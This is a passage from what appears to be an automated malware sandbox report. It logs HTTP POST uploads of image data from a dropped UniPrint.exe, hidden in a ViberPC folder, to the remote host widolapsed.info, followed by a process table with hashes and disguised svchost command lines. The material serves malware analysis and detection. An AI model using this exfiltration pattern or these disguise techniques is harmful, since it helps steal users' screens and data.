                                                                                                      2021-09-15 11:45:33 UTC637OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 8d c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${Owe0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:33 UTC637OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:33 UTC653OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:33 UTC669OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:33 UTC685OUTData Raw: 3a 8a a5 87 a6 ba 19 3c 5d 67 d4 b6 da 85 cb fd e9 5b f3 a6 f9 d2 37 57 27 f1 aa f4 e5 ab f6 71 5b 22 55 69 bd d9 2e e2 7a 93 4b 9a 68 a5 a5 62 d4 9b 1d 4e 14 dc d2 e6 91 69 8e cd 38 1a 8e 9e 29 34 52 63 e9 45 34 52 d4 9a 26 3a 9c 29 80 d3 b2 29 14 98 ec d3 85 33 34 b9 35 2d 16 99 25 14 d0 4d 2f d4 d2 68 a4 c7 8a 5c 8a 8f 7a 0e ac 3f 3a 63 5c c0 9d 5c 1a 5c ac 39 d2 ea 59 07 e5 3f 4a e3 3c 51 ff 00 1f b1 7f d7 21 5d 31 d4 a0 5c 81 93 5c cf 89 4e 6e e1 3f f4 c8 7f 3a a8 c5 ad c1 4d 4a 5a 1c 5d 14 56 e5 e1 48 7c 2f a7 18 e5 d3 e3 79 a1 72 f1 bd a8 69 a5 3e 6b 0c 87 d8 71 80 3f bc 3a 57 03 76 b1 eb a5 73 12 94 33 2a b0 56 20 30 c3 00 7a f7 ae ab 54 82 de 4f 14 4d 6a 4d 84 b6 f6 e6 69 05 b5 b5 b7 94 c3 62 16 08 ec 11 73 9c 63 82 7b d5 5b 65 7d 42 3b 49 2e 17
                                                                                                      Data Ascii: :<]g[7W'q["Ui.zKhbNi8)4RcE4R&:))345-%M/h\z?:c\\\9Y?J<Q!]1\\Nn?:MJZ]VH|/yri>kq?:Wvs3*V 0zTOMjMibsc{[e}B;I.
                                                                                                      2021-09-15 11:45:33 UTC701OUTData Raw: 05 37 ff 00 1b a3 cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 72 3f e9 a0 e7 5f d2 65 ca 2a 9f 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 99 2d dd f4 01 1e 7b 4b 61 1b 48 88 4a 5c 31 23 73 05 ce 0a 0c f5 f5 a7 c8 ff 00 a6 85 ce bf a4 cb f4 51 45 41 61 5e 57 f1 63 fe 43 36 5f f5 c0 ff 00 3a f5 4a f2 bf 8b 1f f2 19
                                                                                                      Data Ascii: 7I(~f>n3SKOo7G#u&\ZS<O}-?)h9rjiM5?tr?_e*7I(~f>n-{KaHJ\1#sQEAa^WcC6_:J
                                                                                                      2021-09-15 11:45:33 UTC716OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 32 38 37 33 39 32 36 36 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4228739266--
                                                                                                      2021-09-15 11:45:34 UTC716INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:33 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=45b0cc69e847efa543c144c39fbf12acab4529b7a9a61083f4eb4f5e97d242e0; expires=Thu, 15-Sep-2022 11:45:34 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:34 UTC716INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      9192.168.2.34976245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:34 UTC716OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81331
                                                                                                      Content-Type: multipart/form-data; boundary=--------3803026718
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:34 UTC717OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 30 33 30 32 36 37 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3803026718Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:34 UTC717OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 7b c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${Owe{0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:34 UTC717OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:34 UTC733OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:34 UTC749OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:34 UTC765OUTData Raw: c2 7f e9 90 fe 75 51 8b 5b 82 9a 94 b4 38 ba 28 ad cb c2 90 f8 5f 4e 31 cb a7 c6 f3 42 e5 e3 7b 50 d3 4a 7c d6 19 0f b0 e3 00 7f 78 74 ae 06 ed 63 d7 4a e6 25 28 66 55 60 ac 40 61 86 00 f5 ef 5d 56 a9 05 bc 9e 28 9a d4 9b 09 6d ed cc d2 0b 6b 6b 6f 29 86 c4 2c 11 d8 22 e7 38 c7 04 f7 aa b6 ca fa 84 76 92 5c 2e 98 f1 de 19 ad d3 ec f6 c2 37 8e 52 80 a8 38 45 07 07 6e 08 cf 53 cd 47 b5 56 b9 5e cd dc e7 d5 99 18 32 92 ac 39 04 1e 45 4d 77 7b 75 7c c8 d7 97 12 4e d1 ae c5 69 1b 71 0b 9c e3 27 eb 5d 02 d9 5a c7 6f 6d 37 d9 e2 27 4d 85 cd e0 65 07 7b 98 c4 88 1b d7 e7 62 bf 85 53 b8 89 13 c3 8b aa 0b 44 13 ce 89 03 2e c5 da 8b 92 3c d0 3b 16 db b7 38 ea 18 e7 91 4f da 2b d8 14 19 89 45 74 17 90 5b ae af e2 65 58 21 11 c1 13 18 80 41 84 3e 6a 01 b7 d3 82 47 1e
                                                                                                      Data Ascii: uQ[8(_N1B{PJ|xtcJ%(fU`@a]V(mkko),"8v\.7R8EnSGV^29EMw{u|Niq']Zom7'Me{bSD.<;8O+Et[eX!A>jG
                                                                                                      2021-09-15 11:45:34 UTC781OUTData Raw: 0a 6f fe 37 47 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 91 ff 00 4d 07 3a fe 93 2e 51 54 fc cd 4f fe 7d 2d 3f f0 29 bf f8 dd 32 5b bb e8 02 3c f6 96 c2 36 91 10 94 b8 62 46 e6 0b 9c 14 19 eb eb 4f 91 ff 00 4d 0b 9d 7f 49 97 e8 a2 8a 82 c2 bc af e2 c7 fc 86 6c bf eb 81 fe 75 ea 95 e5 7f 16 3f e4 33 65 ff 00 5c 0f f3 ad 69 6e cc ea ec 8e 14 53 85 34 52 d6 e8 c5 8e a2 92 96 99 21 45 14 53 00 a5 a4 a2 80 16 8a 4a 28 01 68 a4 a5 a0 02 8a 28 a0 41 45 14 50 01 4b 49 45 30 16 8a 4a 5a 00 5a 29 28 a0 2c 2d 14 94 b4 00 51 45 14 c4 2d 14 94 50 02 d2 d2 52 d3 42 16 8a 4a 5a 62 0c d1 9a 4a 5c 8a 2e 02 d1 49 9a 33 45 c2 c2 d1 9a 4a 05 01 61 73 45 14 50 01 45 14 50 21 68 a4 a2 98 0b 4b 9a 6d 14 5c 2c 3b 34 b9 a6 52 d0 16 1d 4b 4d a5 a6 21 68 a2 8a 62 16 8a 4a 28 01 68
                                                                                                      Data Ascii: o7G7M:.QTO}-?)2[<6bFOMIlu?3e\inS4R!ESJ(h(AEPKIE0JZZ)(,-QE-PRBJZbJ\.I3EJasEPEP!hKm\,;4RKM!hbJ(h
                                                                                                      2021-09-15 11:45:34 UTC796OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 30 33 30 32 36 37 31 38 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3803026718--
                                                                                                      2021-09-15 11:45:35 UTC796INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:34 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=293b9a65d5663fc7d1794afa48d5df4aca76c53fc72b066efee8d86d69ec8603; expires=Thu, 15-Sep-2022 11:45:34 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:35 UTC796INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: wogZe27GBB.exe PID: 6416 Parent PID: 1404

                                                                                                      General

                                                                                                      Start time:13:44:48
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\wogZe27GBB.exe'
                                                                                                      Imagebase:0x400000
                                                                                                      File size:1773472 bytes
                                                                                                      MD5 hash:5EFC68ABD7FEC415E34980D95A06A66A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low

                                                                                                      Analysis Process: svchost.exe PID: 6480 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:44:51
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: UniPrint.exe PID: 6532 Parent PID: 6416

                                                                                                      General

                                                                                                      Start time:13:44:55
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 0%, Metadefender, Browse
                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                      Reputation:low

                                                                                                      Analysis Process: svchost.exe PID: 6644 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:02
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: UniPrint.exe PID: 6736 Parent PID: 4940

                                                                                                      General

                                                                                                      Start time:13:45:08
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low

                                                                                                      Analysis Process: svchost.exe PID: 6992 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:13
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: svchost.exe PID: 7052 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:14
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: svchost.exe PID: 7064 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:14
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: svchost.exe PID: 7104 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:15
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: svchost.exe PID: 4884 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:17
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: svchost.exe PID: 4600 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:19
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: SgrmBroker.exe PID: 3888 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:19
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                      Imagebase:0x7ff770ce0000
                                                                                                      File size:163336 bytes
                                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: svchost.exe PID: 3864 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:20
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
                                                                                                      Imagebase:0x1220000
                                                                                                      File size:44520 bytes
                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: svchost.exe PID: 3348 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:20
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

